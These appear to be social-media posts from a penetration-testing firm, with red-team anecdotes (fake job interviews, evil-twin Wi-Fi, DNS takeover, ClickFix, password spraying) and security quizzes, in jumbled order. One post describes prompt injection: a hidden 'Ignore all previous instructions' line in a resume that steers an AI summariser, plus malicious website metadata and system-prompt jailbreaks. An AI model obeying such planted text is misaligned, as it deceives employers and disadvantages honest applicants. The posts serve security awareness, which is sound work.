🧪 Volkis Lab: Privilege Escalation  

You don’t need exploits when the system hands you the right tool.

🐺 Can you spot it?

Another happy customer review came through today. 😊

2 fake resumé's and very awkward job interviews later, we captured an auth attempt on our evil twin that gained us a foothold into their enterprise network, we also dropped a Raspberry Pi on an ethernet port on the way out!

We didn't get the job 😞, but we got domain admin 😁.

#HackingStories 🐺

We signed in and sat down, waiting to be called. Everyone believed we were just there for the job. Partly true, since we were doing our job.

Two of us polished up our (completely fabricated) resumé's and scored an interview! Everything was going to plan. We turned up for our interview on the day with a laptop in our backpack, running an evil twin attack on their WPA2-Enterprise network.

Through our OSINT, we noticed that they were hiring a bookkeeper for their finance team. We figured the interviews would be held at the office. That was our in.

In a recent red team engagement, we needed to get close to the target office, which was on the 15th floor of a skyscraper. It was too difficult to get to the elevators without having an ID badge, so we thought about good excuses to have them let us in.

We don't need to hack code to change how apps behaves. We just feed the AI a hidden command and let it summarise our resume in a favourable light. 🐺

#VolkisExplains

🐺 A hidden "Ignore all previous instructions" line in a resume.

🐺 Malicious prompts in website metadata to redirect output.

🐺 "Jailbreaks" that trick models into revealing system prompts.

It is common to think an AI agent is safe because it only handles "public" data.

But the most dangerous instructions aren't written by developers.

They are the "Injected" commands 👇

We browsed to the M365 admin panel and yep, Global Admin privilege.

The password vault icon was also on the desktop. Double-click, punch in creds, straight in! The passwords to all their SaaS platforms were right there.

Sometimes it pays to work late. 🐺

#HackingStories

We did this pentest recently where we got Domain Admin. Cool, but we wanted more! We had the admin's creds so we just waited...

When the admin logged out and left for the day, we just logged back in through RDP as him! 👇

🧪 Volkis Lab: This seems suspicious, doesn't it?

Sleep → Decode → Decrypt → Runtime API resolution → explorer.exe

🐺 Name the technique.

Drop the ATT&CK ID if you know it.👇

But instead of try multiple account against one account, we try a few passwords against ALL accounts. That's how password spraying works.

It's okay! Go change your password if you need to. 🙂🐺

#VolkExplains

Does guessing or brute-forcing passwords still work? Yep!

CompanyName123, Monday2026!, Commodore#1... We still see these, and it's often our foothold into a network. 👇

Hackers don’t need fancy tooling anymore, the target system carries it for us.

We can "live off the land".
Your PowerShell. Your MSHTA. Your CERTUTIL.

Your tools, our commands.

#HackingTips

🧪 Volkis Lab: Can you recognise it?

Bonus: Drop the MITRE ATT&CK ID 👇🐺

Pumping yourself up to write a pentest report on a Friday afternoon 📢 🎵🕺

🧪 Volkis Lab: Got a reverse shell?

Don’t rush into recon or privilege escalation.  
Raw, fragile access gets you caught.

Stabilise it first. 
Control before capability.

Drop your thoughts 👇🐺

We were able to take full DNS control of *.staff[.]example[.]com, and create our own user@staff[.]example[.]com email addresses.

That made our phishing engagements a piece of cake!

#VolkExplains 🐺

We looked back through the DNS resolutions in our recon data and noticed that the staff.example[.]com subdomain was returning "REFUSED".

The DNS was also being handled by a cloud DNS provider that is vulnerable to DNS takeovers.

We were on a red team engagement searching through the external infrastructure for a way in. 

Struggling for a way in, a junior asked: "What about DNS?"

That comment made us zoom out a notch.👇

SECURITY DOESN'T MATTER (if the business fails) Security doesn’t matter if the business CAN'T afford it. Thoughts?

Throughout many years in cybersecurity, we've learned a hard lesson.

Cybersecurity is not the most important thing.

Let me explain 👇

🐺 Forgotten project staging
🐺 Forgotten IPs
🐺 Active hosts that are no longer monitored

This is where we usually find the vulns!

#VolkExplains

It’s common to enumerate your attack surface using DNS records. But the weakest systems usually aren’t in DNS.

They are the ones that have drifted: 👇

🧪 Volkis Lab: What attack would you do and what tool(s) would you use?

The scan is telling you everything if you know how to read it.

Drop your answers below 👇🐺

Simple steps:

1. Win + R.
2. Ctrl + V.
3. Enter.

Nothing felt risky, so they followed along without thinking.

Nothing crashed or popped. Just like that, we got in

#HackingStories #VolkExplains

The company rolled out a new webpage. It looked normal. Just another page asking you to “verify you’re human.”

It was a ClickFix attack. 👇

- AD User Object
- Printer
- Cert Template

☝️ Some of the most frustrating examples.

Sometimes the best defence is letting the attacker believe they succeeded. 🐺

#VolkExplains

Nothing annoys us, as attackers, more than well placed honeypots/tokens. It makes us paranoid at every step.

That's good! 👇